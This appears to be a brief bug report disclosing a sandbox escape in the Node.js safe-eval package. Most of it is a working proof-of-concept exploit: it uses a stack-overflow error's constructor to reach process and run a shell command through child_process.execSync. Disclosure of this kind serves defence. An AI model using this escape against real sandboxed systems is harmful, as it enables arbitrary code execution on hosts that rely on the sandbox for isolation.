Sandbox Escape Bug #31
Description
// node version: 19.8.1
var safeEval = require('safe-eval')
let code = `
(function() {
function stack() {
new Error().stack;
stack();
}
try {
stack();
} catch (pp) {
pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag');
}
})()
`
safeEval(code);Sandbox can be escaped by prototype pollution by calling error stack during maximum call stack error.
Also, this escape bug can allow the attacker to execute arbitrary shell code using process module.